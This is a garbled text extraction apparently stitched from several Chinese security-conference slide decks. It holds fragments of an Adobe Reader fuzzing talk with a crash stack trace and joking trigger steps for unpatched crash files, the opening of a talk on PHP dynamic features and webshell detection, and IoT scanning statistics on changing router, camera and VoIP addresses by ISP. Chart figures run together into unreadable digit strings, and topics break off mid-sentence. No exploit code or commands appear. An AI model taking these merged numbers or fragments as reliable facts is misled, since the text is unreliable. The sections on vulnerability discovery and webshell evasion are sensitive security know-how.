161、fo:operator=+0 xb1233002cf158 57e6ee62 347faff0 bb8df9bb 3b00cff0 ACROFORM!DllUnregisterServer+0 x3a7e1002cf19c 57e6e7b7 0000041d bb8dfa2b 0000041d AcroRd32_57de0000!DllCanUnloadNow+0 x1dce6Patched Sample 2 32位Windows 7环境中以1280 x800为分辨率最大化启动Adobe Reader并均匀点击七下确定可触发.pdf以及稍微麻烦点的因为这个还没补(深呼吸)打开文件后等待右下角“

162、store and share files”字样出来后点击第一个对话框然后取消保存文件选项并确认字体缺失对话框后等待十秒点击JS对话框后触发.pdf还有锻炼肺活量的 Fuzzing还在缓慢的继续中,大约每10秒一个样本 佛系漏洞挖掘者大概每周看一次结果 漏洞提交也是随缘,想起来就提交三五个 估计目前没有其他人找到类似的漏洞 我们获得了在KCON得瑟的素材 冯小刚-功夫.jpg应该达成目标了此处应有掌声完了PHPCHIP.COM PHP动态特性的捕捉与逃逸Phith0n2019目录CONTENTSPART 01PHP与动态特性01PART 02如何检测PHP动态特性02PART 03从攻击者的角

163、度突破限制03PHP与动态特性常见PHP Webshell的类型我们来做一个“代码哲学家”PART 01PHP与动态特性PHP与Web应用PHP是世界上最好的语言PHP是Web应用最广泛的语言灵活发展迅速逐渐废弃不安全的特性其灵活的特性往往成为Webshell、漏洞的导火索常见PHP Webshell的类型 直接型:对比间隔时间扫描结束18,87815,35518,53414,10529,92033,44730,26334,68826,96024,55727,79326,0760

324、5,00010,00015,00020,00025,00030,00035,00040,000间隔6天间隔34天间隔49天间隔74天暴露资产(个)对比时间无变化消失资产新出现资产两次对比类型没有发生变化的数量相对于基准消失的资产数量相对于基准新增的资产数量路 由 器 变 化 情 况80端口路由器 平均扫描周期3天 总量约5万u 变化的资产数量相对稳定,约有3.3万路由器网络地址发生过变化,约占总量的68%40,02135,19534,16228,370141,984146,810151,282153,635156,634167,817167,917184,164050,000100,00015

325、0,000200,000间隔16天间隔28天间隔40天间隔64天暴露资产(个)对比时间无变化消失资产新出现资产VoIP电 话 变 化 情 况5060端口VoIP电话 平均扫描周期3天 总量约18万u 变化的资产数量相对稳定,约有15万VoIP电话网络地址发生过变化,大约占总资产量的80%摄 像 头 变 化 情 况356,042327,989308,393303,499123,192151,245170,841175,735127,975156,589177,893185,131050,000100,000150,000200,000250,000300,000350,000400,000间隔3

326、天间隔6天间隔12天间隔15天暴露资产(个)对比时间无变化消失资产新出现资产554端口摄像头 平均扫描周期3天 总量约47万u 约有15万摄像头网络地址发生过变化,占总资产量的25%68%Router80%VoIP25%Camera观察发现:互联网上的暴露物联网资产网络地址,根据类型的不同均存在着不同程度的变化,并且新增和消失的数量几乎平衡,变化量随着时间的推移缓慢递增摄 像 头 变 化 情 况(平均扫描周期增加到7天)263,346255,615253,186243,053179,506187,237189,665199,801183,815194,817198,747207,148050,

327、000100,000150,000200,000250,000300,000间隔23天间隔33天间隔38天间隔56天暴露资产(个)对比时间无变化消失资产新出现资产554端口摄像头 扫描周期增加到7天u 增加平均扫描周期,相比之前间隔3天,资产的变化量45%,相比之前3天扫描周期增加20%;但有24万资产,间隔56天未发生变化观察发现:在一定范围内,缩短国内资产平均扫描周期,可以减少资产变化数量;同样有一部分物联网资产地址在观测时间内一直都没有变化33,20032,30431,27530,6453,9125,0895,9156,3934,1255,0216,0506,680010,00020,0

328、0030,00040,000间隔3天间隔6天间隔9天间隔11天暴露资产(个)无变化消失资产新出现资产18,45019,86319,54719,1521,9751,3312,6183,4091,9142,7382,3443,78505,00010,00015,00020,00025,000间隔3天间隔6天间隔9天间隔10天暴露资产(个)无变化消失资产新出现资产日 本 5 5 4 端 口 摄 像 头 变 化 情 况新 加 坡 5 5 4 端 口 摄 像 头 变 化 情 况亚 太 地 区 物 联 网 资 产 变 化 并 不 明 显对比于国内,日本和新加坡的资产变化比例明显小的多,仅有不到15%的资产

329、在变化资 产 网 络 地 址 变 化 原 因 分 析PART 03关 于 资 产 变 化 的 猜 想猜想1:物联网资产的网络地址变更,导致我们看到的资产变化猜想2:网络地址变化可能在一定范围内,并且有可能和运营商相关分 布 在 同 C 段 映 射 的 物 联 网 资 产 统 计0-20,5,560,194,59%20-50,2,025,966,21%50-100,1,465,491,15%100以上,453,381,5%累计2个月物联网设备IP分布在同网段的数量统计发现:同一网段物联网资产数量大于20的资产数量占总量的41%资 产 C 段 映 射 变 化 明 显 下 降4

330、7459048725456344732547806490780200004000060000800000140000间隔23天间隔33天间隔38天间隔56天暴露资产(个)无变化消失网段新增网段554端口的摄像头302829499573834300422444763684020004000600080004000间隔26天间隔34天间隔49天间隔58天暴露资产(个)不变网段消失网段新增网段80端口的路由器47,18247,58647,79439,80110,0231

331、0,85611,37117,14512,03112,05212,1268,331010,00020,00030,00040,00050,000间隔16天间隔28天间隔40天间隔49天暴露资产(个)无变化消失网段新增网段5060端口VoIP电话35%网段发生变化30%网段发生变化25%网段发生变化40%70%80%35%30%25%0.60%1.04%4.09%0%20%40%60%80%摄像头路由器VoIP电话网络地址C段映射B段映射物 联 网 资 产 地 址 变 化 与 网 段 变 化 对 比发现:物联网资产网络地址在一定网段内变化结论:运营商采用的动态分配地址的策略导致物联网资产网络地址变

332、化网 络 地 址 变 化 资 产 的 运 营 商 分 布 情 况7.78%8.94%11.61%12.00%41.03%48.02%63.09%8784704200500000002500030000350000.00%10.00%20.00%30.00%40.00%50.00%60.00%70.00%中国移动通信公司中国联通China169骨干网中国电信骨干网中华电信(台湾)中国电信集团中国电信广域网核心自治系统北京电信通网络科技有限公司IP运营商名称变化占比变化数量10.88%11.07%24.50%31.30%53.11%

333、55.22%60.84%70.80%73773352094000000.00%20.00%40.00%60.00%80.00%中国移动通信公司中华电信(台湾)电讯盈科有限公司中国电信集团中国电信骨干网中国联通China169骨干网中国联通北京市网络中国联通IP网络广东省China169变化占比变化数量554端口摄像头变化资产ASN分布情况80端口路由器变化资产ASN分布情况IPv6 物 联 网 资 产 网 络 地 址 变 化 情 况PART 04IPv6 网 络 地 址 探 测 的 困 难 性IPv6地址数量是IPv4的296倍,IPv6可以地球上每一粒沙分配一个IP,而且还有剩余目前IPv6地址使用的实际数量较少,并且地址分布的随机性较大通过对全网扫描发现IPv6资产,从时间和资源上都不切实际利 用
